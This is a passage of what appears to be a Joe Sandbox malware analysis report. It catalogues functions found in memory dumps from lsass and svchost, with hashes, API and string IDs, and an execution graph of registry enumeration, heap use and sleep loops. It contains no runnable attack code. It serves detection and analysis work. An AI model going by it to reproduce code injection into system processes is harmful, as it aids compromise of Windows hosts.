                                                        Function 00000202C0AEBC98 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 27libraryloaderCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000001A.00000002.3152289425.00000202C0AE0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000202C0AE0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_26_2_202c0ae0000_lsass.jbxd
                                                        Similarity
                                                        • API ID: AddressFreeHandleLibraryModuleProc
                                                        • String ID: CorExitProcess$mscoree.dll
                                                        • API String ID: 4061214504-1276376045
                                                        • Opcode ID: 0f45d19500fbd6816ab24c8a126c5dacde8056cea587c59ff890217df17fdf5d
                                                        • Instruction ID: b1dae043e590163143f4e82ec39ab210fa29368e4bf0a17308b2a9fdf74dbffb
                                                        • Opcode Fuzzy Hash: 0f45d19500fbd6816ab24c8a126c5dacde8056cea587c59ff890217df17fdf5d
                                                        • Instruction Fuzzy Hash: 65F06262211B45C1FB108B24E8CC35E6360EB88765F55021BCB6A452F6DF3DC55C8700
                                                        Function 00000202C0AE50D0 Relevance: 7.8, APIs: 5, Instructions: 318threadCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 0000001A.00000002.3152289425.00000202C0AE0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000202C0AE0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_26_2_202c0ae0000_lsass.jbxd
                                                        Similarity
                                                        • API ID: CurrentThread
                                                        • String ID:
                                                        • API String ID: 2882836952-0
                                                        • Opcode ID: e13ad259af2044a9722e5c88be2fea28068701e2040856c8b7ebe2328a6e9181
                                                        • Instruction ID: cdd9b78ec5eaf04cb1b2f14923f4cedba8257b9bf05445ea44050982a578b50b
                                                        • Opcode Fuzzy Hash: e13ad259af2044a9722e5c88be2fea28068701e2040856c8b7ebe2328a6e9181
                                                        • Instruction Fuzzy Hash: 6C02A432219B84C6EB60CB55F49875EB7A1F384794F110117EBDE87BAADB78C498CB00
                                                        Function 00000202C0AE5710 Relevance: 7.6, APIs: 5, Instructions: 124threadCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 0000001A.00000002.3152289425.00000202C0AE0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000202C0AE0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_26_2_202c0ae0000_lsass.jbxd
                                                        Similarity
                                                        • API ID: CurrentThread
                                                        • String ID:
                                                        • API String ID: 2882836952-0
                                                        • Opcode ID: b02f694671304b5a077fe24bce3094f0c3b02718cee177a37b7a7da192a85efa
                                                        • Instruction ID: 76b413ec14e38a6ac9e88e25468b0616ac705ba1cdb0ca70ff7d6d8fad0dbab9
                                                        • Opcode Fuzzy Hash: b02f694671304b5a077fe24bce3094f0c3b02718cee177a37b7a7da192a85efa
                                                        • Instruction Fuzzy Hash: 6061B676619B80C6F660CB15F48871E77A0F388794F110517EBDE47BAADB78C968CB40
                                                        Function 00000202C0AF4104 Relevance: 7.6, APIs: 5, Instructions: 56COMMONLIBRARYCODE
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 0000001A.00000002.3152289425.00000202C0AE0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000202C0AE0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_26_2_202c0ae0000_lsass.jbxd
                                                        Similarity
                                                        • API ID: _set_statfp
                                                        • String ID:
                                                        • API String ID: 1156100317-0
                                                        • Opcode ID: 9af7c444609857cffc651de9bcb8f693be62289a5d0e310862a2fbcb97617874
                                                        • Instruction ID: aadaf6c08f9748136de9f6cbceaa287ca2a5a32013c1ebda6f4ef6558c209bf0
                                                        • Opcode Fuzzy Hash: 9af7c444609857cffc651de9bcb8f693be62289a5d0e310862a2fbcb97617874
                                                        • Instruction Fuzzy Hash: EE119E23A10B54A9F7641568E8DE36D11406B683F8F0A0727AB76076EB8B2AC8CD424C
                                                        Function 00000202C0AC3504 Relevance: 7.6, APIs: 5, Instructions: 56COMMONLIBRARYCODE
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 0000001A.00000002.3152046246.00000202C0AB0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000202C0AB0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_26_2_202c0ab0000_lsass.jbxd
                                                        Similarity
                                                        • API ID: _set_statfp
                                                        • String ID:
                                                        • API String ID: 1156100317-0
                                                        • Opcode ID: 9af7c444609857cffc651de9bcb8f693be62289a5d0e310862a2fbcb97617874
                                                        • Instruction ID: 2438009d4eccd0bfdc5c9a2303f4341fa76b055f83bc79e43529a95e1e4287f6
                                                        • Opcode Fuzzy Hash: 9af7c444609857cffc651de9bcb8f693be62289a5d0e310862a2fbcb97617874
                                                        • Instruction Fuzzy Hash: 5B112533A5CF09C9FAA42128E4CE37D10D07B59370F4B863BAB76163E7CA6AC84C4201
                                                        Function 00000202C0ABF040 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 182COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000001A.00000002.3152046246.00000202C0AB0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000202C0AB0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_26_2_202c0ab0000_lsass.jbxd
                                                        Similarity
                                                        • API ID: _invalid_parameter_noinfo
                                                        • String ID: Tuesday$Wednesday$or copy constructor iterator'
                                                        • API String ID: 3215553584-4202648911
                                                        • Opcode ID: 9e57f18f61c22f0406784eb273be7b0d6046b42052b72e443b30de0c50228f55
                                                        • Instruction ID: 26cf979074d90fcf05d85e544fcdcf7579b7cc95cef60043f929738aa5a5c4dc
                                                        • Opcode Fuzzy Hash: 9e57f18f61c22f0406784eb273be7b0d6046b42052b72e443b30de0c50228f55
                                                        • Instruction Fuzzy Hash: F2610536600760C6FA69DB69E5CC76E6AA0F789780F5B8917CB0A177A7DB34C84DC300
                                                        Function 00000202C0AEAA1C Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 147COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000001A.00000002.3152289425.00000202C0AE0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000202C0AE0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_26_2_202c0ae0000_lsass.jbxd
                                                        Similarity
                                                        • API ID: CallEncodePointerTranslator
                                                        • String ID: MOC$RCC
                                                        • API String ID: 3544855599-2084237596
                                                        • Opcode ID: c123fbbb8780cd52d1c7b069b1b1cc678e7e4f5673d54000f6e5fbfac7098139
                                                        • Instruction ID: 558256b13703980bb35bc78ab76fb44dce15fdc78b8fdb1fb2b32ce49efec02f
                                                        • Opcode Fuzzy Hash: c123fbbb8780cd52d1c7b069b1b1cc678e7e4f5673d54000f6e5fbfac7098139
                                                        • Instruction Fuzzy Hash: 36614832600B84CAFB20DF65D48839D77A0F399B88F154217EF9917B9ADB78D5A9C700
                                                        Function 00000202C0AEAD78 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 145COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000001A.00000002.3152289425.00000202C0AE0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000202C0AE0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_26_2_202c0ae0000_lsass.jbxd
                                                        Similarity
                                                        • API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
                                                        • String ID: csm$csm
                                                        • API String ID: 3896166516-3733052814
                                                        • Opcode ID: b607b9418e38c48ebb6f53552568b8ff7a3aff5a85fd43f0b6d07fa9fad214e5
                                                        • Instruction ID: 97304d35c4b486749e002e92b9cf81982149fd581c5d11b448b14438c7f928ed
                                                        • Opcode Fuzzy Hash: b607b9418e38c48ebb6f53552568b8ff7a3aff5a85fd43f0b6d07fa9fad214e5
                                                        • Instruction Fuzzy Hash: 44514C721007C0CAFB648B2595CC35D77A0F766B95F1A4217DBE947B96CB38E4A9CB00
                                                        Function 00000202C0ABA178 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 145COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000001A.00000002.3152046246.00000202C0AB0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000202C0AB0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_26_2_202c0ab0000_lsass.jbxd
                                                        Similarity
                                                        • API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
                                                        • String ID: csm$csm
                                                        • API String ID: 3896166516-3733052814
                                                        • Opcode ID: b607b9418e38c48ebb6f53552568b8ff7a3aff5a85fd43f0b6d07fa9fad214e5
                                                        • Instruction ID: 19c43cd71e60161d93812c77d0e4ac8737510cff6eeb5711627b4654a467fa8f
                                                        • Opcode Fuzzy Hash: b607b9418e38c48ebb6f53552568b8ff7a3aff5a85fd43f0b6d07fa9fad214e5
                                                        • Instruction Fuzzy Hash: 44516D36104780CAFB748B25959C39C7BA0F365B94F1A8217DB998BBD7CB39D499C700
                                                        Function 00000202C0AB8405 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 135COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000001A.00000002.3152046246.00000202C0AB0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000202C0AB0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_26_2_202c0ab0000_lsass.jbxd
                                                        Similarity
                                                        • API ID: CurrentImageNonwritable__except_validate_context_record
                                                        • String ID: csm$f
                                                        • API String ID: 3242871069-629598281
                                                        • Opcode ID: 114af5d7cf0438a1297bb8b9b6869ba79c6078414514cf9bb502ab9f42d0baed
                                                        • Instruction ID: 8446a618bbd1140fecb175adc7a255fff733e8375c6260d7fd1f59283cc66251
                                                        • Opcode Fuzzy Hash: 114af5d7cf0438a1297bb8b9b6869ba79c6078414514cf9bb502ab9f42d0baed
                                                        • Instruction Fuzzy Hash: 1151AB32601700CAFB29CF29E48CB5D3795F354B98F568227DB164378AEB35D889C704
                                                        Function 00000202C0AB83E8 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 75COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000001A.00000002.3152046246.00000202C0AB0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000202C0AB0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_26_2_202c0ab0000_lsass.jbxd
                                                        Similarity
                                                        • API ID: CurrentImageNonwritable__except_validate_context_record
                                                        • String ID: csm$f
                                                        • API String ID: 3242871069-629598281
                                                        • Opcode ID: 0036035fc280b7a5a111a049c7edfc77b7be6b9ab52e14187ebc45e366edaa55
                                                        • Instruction ID: 90803dd6b9b29f9c4154e969358d487dae67566bd5ce1f620f43925fcc542657
                                                        • Opcode Fuzzy Hash: 0036035fc280b7a5a111a049c7edfc77b7be6b9ab52e14187ebc45e366edaa55
                                                        • Instruction Fuzzy Hash: 7F316A32201740D6FB299F29E88C75D7BA4F340B98F168117AF5A07786DB39C948C704
                                                        Function 00000202C0AF2058 Relevance: 6.3, APIs: 4, Instructions: 299fileCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 0000001A.00000002.3152289425.00000202C0AE0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000202C0AE0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_26_2_202c0ae0000_lsass.jbxd
                                                        Similarity
                                                        • API ID: FileWrite$ConsoleErrorLastOutput
                                                        • String ID:
                                                        • API String ID: 2718003287-0
                                                        • Opcode ID: 3a35214534a53fd0655822596b90f4932f5655332a96a267e8fac8abb8670521
                                                        • Instruction ID: 5415e984cde6a1f954e745032577872c235aef40fdbcb0d3a10d64624b9653db
                                                        • Opcode Fuzzy Hash: 3a35214534a53fd0655822596b90f4932f5655332a96a267e8fac8abb8670521
                                                        • Instruction Fuzzy Hash: 99D1BC73B14B80C9F721CFA9D48829C3BA1F354B98F158217CF5A97B9ADA39C54AC740
                                                        Function 00000202C0AE14A4 Relevance: 6.3, APIs: 5, Instructions: 42memoryCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 0000001A.00000002.3152289425.00000202C0AE0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000202C0AE0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_26_2_202c0ae0000_lsass.jbxd
                                                        Similarity
                                                        • API ID: Heap$Process$Free
                                                        • String ID:
                                                        • API String ID: 3168794593-0
                                                        • Opcode ID: fccdced75e0e166058a65fb9f01cb5bc762ae8e924348a52df6b038ca287fb4d
                                                        • Instruction ID: e1a4700da16e8d3ef1b17da53b22238d79ed5d8b917823312ea25b365b8a4f34
                                                        • Opcode Fuzzy Hash: fccdced75e0e166058a65fb9f01cb5bc762ae8e924348a52df6b038ca287fb4d
                                                        • Instruction Fuzzy Hash: 1E117977500B90C6F714DF62A88C14DB7A4F788F81F0A4127EB4903766DE39C0598744
                                                        Function 00000202C0AF2980 Relevance: 6.2, APIs: 4, Instructions: 218COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 0000001A.00000002.3152289425.00000202C0AE0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000202C0AE0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_26_2_202c0ae0000_lsass.jbxd
                                                        Similarity
                                                        • API ID: ConsoleErrorLastMode
                                                        • String ID:
                                                        • API String ID: 953036326-0
                                                        • Opcode ID: fa691138abb93940963a85324df6708f2ee223ec670a65e1a7af20f8b77031a4
                                                        • Instruction ID: 7750c07c3da3ab5777ee1fb19e88fe5ee8ba8c540cdc789170c23b37d6888931
                                                        • Opcode Fuzzy Hash: fa691138abb93940963a85324df6708f2ee223ec670a65e1a7af20f8b77031a4
                                                        • Instruction Fuzzy Hash: D9918A73610B50C9FB61DF6594CC7AD2BA0B744B88F56410BDF4A67A96DB3AC88BC700
                                                        Function 00000202C0AE7960 Relevance: 6.0, APIs: 4, Instructions: 39timethreadCOMMONLIBRARYCODE
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 0000001A.00000002.3152289425.00000202C0AE0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000202C0AE0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_26_2_202c0ae0000_lsass.jbxd
                                                        Similarity
                                                        • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                                                        • String ID:
                                                        • API String ID: 2933794660-0
                                                        • Opcode ID: 561ac6f4885ef0f33bff27beb4ddb95e6a253367b5c72fac45fcb4617ca9122b
                                                        • Instruction ID: c1e121f40b66a15715f8d269b70c98ee374ca54bb48e74cdb6f3174d14493375
                                                        • Opcode Fuzzy Hash: 561ac6f4885ef0f33bff27beb4ddb95e6a253367b5c72fac45fcb4617ca9122b
                                                        • Instruction Fuzzy Hash: 34111C22710B01C9FB00CB60E8983AC33A4F719B58F450E22DB6D467A5DB78C5988380
                                                        Function 00000202C0AB9E1C Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 147COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000001A.00000002.3152046246.00000202C0AB0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000202C0AB0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_26_2_202c0ab0000_lsass.jbxd
                                                        Similarity
                                                        • API ID: CallTranslator
                                                        • String ID: MOC$RCC
                                                        • API String ID: 3163161869-2084237596
                                                        • Opcode ID: c123fbbb8780cd52d1c7b069b1b1cc678e7e4f5673d54000f6e5fbfac7098139
                                                        • Instruction ID: f3028f0bacb26f4c6116040a1e45f79bacc9d5a175de68b6d573a429fff7c7f3
                                                        • Opcode Fuzzy Hash: c123fbbb8780cd52d1c7b069b1b1cc678e7e4f5673d54000f6e5fbfac7098139
                                                        • Instruction Fuzzy Hash: B7614532A00B84CAFB24DF65D4883AD77A0F748B98F154217EF4917B9ADB38D599C704
                                                        Function 00000202C0AE2330 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 141COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000001A.00000002.3152289425.00000202C0AE0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000202C0AE0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_26_2_202c0ae0000_lsass.jbxd
                                                        Similarity
                                                        • API ID: FileType
                                                        • String ID: \\.\pipe\
                                                        • API String ID: 3081899298-91387939
                                                        • Opcode ID: 713d5f66120afee1318357aa22047e1871f046a8e1f6ca4f8182a23e28854f89
                                                        • Instruction ID: 3514571e2c1d6cd3889b28a5e79674fb4b07f5075b2e224e86b20f94a4d05b12
                                                        • Opcode Fuzzy Hash: 713d5f66120afee1318357aa22047e1871f046a8e1f6ca4f8182a23e28854f89
                                                        • Instruction Fuzzy Hash: 2B5180322087C1C1F6649B29A5DC3BEA791F385B80F560127DFEA03B9BDA39C52D8750
                                                        Function 00000202C0AF26F0 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 100fileCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000001A.00000002.3152289425.00000202C0AE0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000202C0AE0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_26_2_202c0ae0000_lsass.jbxd
                                                        Similarity
                                                        • API ID: ErrorFileLastWrite
                                                        • String ID: U
                                                        • API String ID: 442123175-4171548499
                                                        • Opcode ID: 769e155e8e03be1ef4aeb5f55e8b8ada6faf705201daec98c5fb8cb61498ce5a
                                                        • Instruction ID: b84669cd5d919c91a09ffca97e8587df6a0950af1a2baa035680203c31bd1311
                                                        • Opcode Fuzzy Hash: 769e155e8e03be1ef4aeb5f55e8b8ada6faf705201daec98c5fb8cb61498ce5a
                                                        • Instruction Fuzzy Hash: 93418E63614B80C6EB209F25E8883AEA7A0F798794F524023EF4D87795EB39C44AC740
                                                        Function 00000202C0AE94A0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44COMMONLIBRARYCODE
                                                        Download Yara Rule
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000001A.00000002.3152289425.00000202C0AE0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000202C0AE0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_26_2_202c0ae0000_lsass.jbxd
                                                        Similarity
                                                        • API ID: ExceptionFileHeaderRaise
                                                        • String ID: csm
                                                        • API String ID: 2573137834-1018135373
                                                        • Opcode ID: 596d8aa0106168f831d5a6617a756b303fb26e5894bac8705379b132699e985d
                                                        • Instruction ID: 149d407967b934cd8ed689359ce0485475af0033eaf3f8f7976efa754672e473
                                                        • Opcode Fuzzy Hash: 596d8aa0106168f831d5a6617a756b303fb26e5894bac8705379b132699e985d
                                                        • Instruction Fuzzy Hash: 8F112B36214B8082EB618B15E48835D77E5F788B94F594222EFCC077A9DF3DC569CB04
                                                        Function 00000202C0AB7356 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 18COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000001A.00000002.3152046246.00000202C0AB0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000202C0AB0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_26_2_202c0ab0000_lsass.jbxd
                                                        Similarity
                                                        • API ID: __std_exception_copy
                                                        • String ID: ierarchy Descriptor'$riptor at (
                                                        • API String ID: 592178966-758928094
                                                        • Opcode ID: 13d46e236c22f038e3183f277bc937bc0c01c293d14bd07e4c5c2ea041926035
                                                        • Instruction ID: 8da40ad284d153a9b89d1544e12ba7a913fe1935213764a8cba5128ad5ea2d85
                                                        • Opcode Fuzzy Hash: 13d46e236c22f038e3183f277bc937bc0c01c293d14bd07e4c5c2ea041926035
                                                        • Instruction Fuzzy Hash: A1E08661641B44D0EF018F31E88829C33A4DB58B64F9A91239A5C06312FA38D1EDC300
                                                        Function 00000202C0AB73B4 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 17COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000001A.00000002.3152046246.00000202C0AB0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000202C0AB0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_26_2_202c0ab0000_lsass.jbxd
                                                        Similarity
                                                        • API ID: __std_exception_copy
                                                        • String ID: Locator'$riptor at (
                                                        • API String ID: 592178966-4215709766
                                                        • Opcode ID: af0f0512ca75cd806a30771dd11e2a0f17b9e6725b3a9df23089972a8cb9d3f7
                                                        • Instruction ID: 5205816057d34bf06f4ea810c880042c8f0231ff55e9ce8539c58bb0b426eeb2
                                                        • Opcode Fuzzy Hash: af0f0512ca75cd806a30771dd11e2a0f17b9e6725b3a9df23089972a8cb9d3f7
                                                        • Instruction Fuzzy Hash: 30E08661601F44C0EF058F31D88419C73A4E758B54F8A9123DA4C06312EA38D1E9C300
                                                        Function 00000202C0AE1BF4 Relevance: 5.1, APIs: 4, Instructions: 52memoryCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 0000001A.00000002.3152289425.00000202C0AE0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000202C0AE0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_26_2_202c0ae0000_lsass.jbxd
                                                        Similarity
                                                        • API ID: Heap$Process$AllocFree
                                                        • String ID:
                                                        • API String ID: 756756679-0
                                                        • Opcode ID: e6b128499454e36a5cfdb4ce6de946333e896a2fc86765bea62df52d9c8f7d1a
                                                        • Instruction ID: 0bfdd2f4f70d0c77588d297d632a834cc4e271defd7936f82574c36193d19b8d
                                                        • Opcode Fuzzy Hash: e6b128499454e36a5cfdb4ce6de946333e896a2fc86765bea62df52d9c8f7d1a
                                                        • Instruction Fuzzy Hash: 6C119A26601B94C1FA44CB66A88C22D63A0FBC8FC0F1A412BDF8D83766DF39C45AC300

                                                        Execution Graph

                                                        Execution Coverage:0.7%
                                                        Dynamic/Decrypted Code Coverage:0%
                                                        Signature Coverage:0%
                                                        Total number of Nodes:73
                                                        Total number of Limit Nodes:2
                                                        execution_graph 14854 2a661301abc 14859 2a661301628 GetProcessHeap 14854->14859 14856 2a661301ad2 Sleep SleepEx 14857 2a661301acb 14856->14857 14857->14856 14858 2a661301598 StrCmpIW StrCmpW 14857->14858 14858->14857 14860 2a661301648 __std_exception_copy 14859->14860 14904 2a661301268 GetProcessHeap 14860->14904 14862 2a661301650 14863 2a661301268 2 API calls 14862->14863 14864 2a661301661 14863->14864 14865 2a661301268 2 API calls 14864->14865 14866 2a66130166a 14865->14866 14867 2a661301268 2 API calls 14866->14867 14868 2a661301673 14867->14868 14869 2a66130168e RegOpenKeyExW 14868->14869 14870 2a6613018a6 14869->14870 14871 2a6613016c0 RegOpenKeyExW 14869->14871 14870->14857 14872 2a6613016e9 14871->14872 14873 2a6613016ff RegOpenKeyExW 14871->14873 14908 2a6613012bc RegQueryInfoKeyW 14872->14908 14874 2a66130173a RegOpenKeyExW 14873->14874 14875 2a661301723 14873->14875 14878 2a66130175e 14874->14878 14879 2a661301775 RegOpenKeyExW 14874->14879 14919 2a66130104c RegQueryInfoKeyW 14875->14919 14882 2a6613012bc 13 API calls 14878->14882 14883 2a661301799 14879->14883 14884 2a6613017b0 RegOpenKeyExW 14879->14884 14885 2a66130176b RegCloseKey 14882->14885 14886 2a6613012bc 13 API calls 14883->14886 14887 2a6613017eb RegOpenKeyExW 14884->14887 14888 2a6613017d4 14884->14888 14885->14879 14891 2a6613017a6 RegCloseKey 14886->14891 14889 2a661301826 RegOpenKeyExW 14887->14889 14890 2a66130180f 14887->14890 14892 2a6613012bc 13 API calls 14888->14892 14894 2a66130184a 14889->14894 14895 2a661301861 RegOpenKeyExW 14889->14895 14893 2a66130104c 5 API calls 14890->14893 14891->14884 14896 2a6613017e1 RegCloseKey 14892->14896 14897 2a66130181c RegCloseKey 14893->14897 14898 2a66130104c 5 API calls 14894->14898 14899 2a66130189c RegCloseKey 14895->14899 14900 2a661301885 14895->14900 14896->14887 14897->14889 14901 2a661301857 RegCloseKey 14898->14901 14899->14870 14902 2a66130104c 5 API calls 14900->14902 14901->14895 14903 2a661301892 RegCloseKey 14902->14903 14903->14899 14925 2a661316168 14904->14925 14906 2a661301283 GetProcessHeap 14907 2a6613012ae __std_exception_copy 14906->14907 14907->14862 14909 2a661301327 GetProcessHeap 14908->14909 14910 2a66130148a RegCloseKey 14908->14910 14913 2a66130133e __std_exception_copy 14909->14913 14910->14873 14911 2a661301476 GetProcessHeap HeapFree 14911->14910 14912 2a661301352 RegEnumValueW 14912->14913 14913->14911 14913->14912 14915 2a66130141e lstrlenW GetProcessHeap 14913->14915 14916 2a6613013d3 GetProcessHeap 14913->14916 14917 2a6613013f3 GetProcessHeap HeapFree 14913->14917 14918 2a661301443 StrCpyW 14913->14918 14926 2a66130152c 14913->14926 14915->14913 14916->14913 14917->14915 14918->14913 14920 2a6613011b5 RegCloseKey 14919->14920 14923 2a6613010bf __std_exception_copy 14919->14923 14920->14874 14921 2a6613010cf RegEnumValueW 14921->14923 14922 2a66130114e GetProcessHeap 14922->14923 14923->14920 14923->14921 14923->14922 14924 2a66130116e GetProcessHeap HeapFree 14923->14924 14924->14923 14927 2a66130157c 14926->14927 14930 2a661301546 14926->14930 14927->14913 14928 2a66130155d StrCmpIW 14928->14930 14929 2a661301565 StrCmpW 14929->14930 14930->14927 14930->14928 14930->14929 14931 2a6612d273c 14934 2a6612d276a 14931->14934 14932 2a6612d28d4 14933 2a6612d2858 LoadLibraryA 14933->14934 14934->14932 14934->14933

                                                        Executed Functions

                                                        Function 000002A66130328C Relevance: 4.5, APIs: 3, Instructions: 43threadCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 0000001D.00000002.3144342453.000002A661300000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002A661300000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_29_2_2a661300000_svchost.jbxd
                                                        Similarity
                                                        • API ID: Current$FileModuleNameProcessProtectThreadVirtual$CreateFindHandlePath
                                                        • String ID:
                                                        • API String ID: 1683269324-0
                                                        • Opcode ID: c94412c55dcd243bcd3fbe265bea19663896af10ab27123b85acb7154d5eea14
                                                        • Instruction ID: 077229c1eed964279b07ec97370b47b92095969d86f76acc536d4c6ada0caa5e
                                                        • Opcode Fuzzy Hash: c94412c55dcd243bcd3fbe265bea19663896af10ab27123b85acb7154d5eea14
                                                        • Instruction Fuzzy Hash: DC11AD70F246408BFB60EB61F98DB6923ECA746F46F8C41249907A3691EF7CC04C8283
                                                        Function 000002A661301ABC Relevance: 3.1, APIs: 2, Instructions: 68sleepCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        APIs
                                                          • Part of subcall function 000002A661301628: GetProcessHeap.KERNEL32 ref: 000002A661301633
                                                          • Part of subcall function 000002A661301628: HeapAlloc.KERNEL32 ref: 000002A661301642
                                                          • Part of subcall function 000002A661301628: RegOpenKeyExW.ADVAPI32 ref: 000002A6613016B2
                                                          • Part of subcall function 000002A661301628: RegOpenKeyExW.ADVAPI32 ref: 000002A6613016DF
                                                          • Part of subcall function 000002A661301628: RegCloseKey.ADVAPI32 ref: 000002A6613016F9
                                                          • Part of subcall function 000002A661301628: RegOpenKeyExW.ADVAPI32 ref: 000002A661301719
                                                          • Part of subcall function 000002A661301628: RegCloseKey.ADVAPI32 ref: 000002A661301734
                                                          • Part of subcall function 000002A661301628: RegOpenKeyExW.ADVAPI32 ref: 000002A661301754
                                                          • Part of subcall function 000002A661301628: RegCloseKey.ADVAPI32 ref: 000002A66130176F
                                                          • Part of subcall function 000002A661301628: RegOpenKeyExW.ADVAPI32 ref: 000002A66130178F
                                                          • Part of subcall function 000002A661301628: RegCloseKey.ADVAPI32 ref: 000002A6613017AA
                                                          • Part of subcall function 000002A661301628: RegOpenKeyExW.ADVAPI32 ref: 000002A6613017CA
                                                        • Sleep.KERNEL32 ref: 000002A661301AD7
                                                        • SleepEx.KERNELBASE ref: 000002A661301ADD
                                                          • Part of subcall function 000002A661301628: RegCloseKey.ADVAPI32 ref: 000002A6613017E5
                                                          • Part of subcall function 000002A661301628: RegOpenKeyExW.ADVAPI32 ref: 000002A661301805
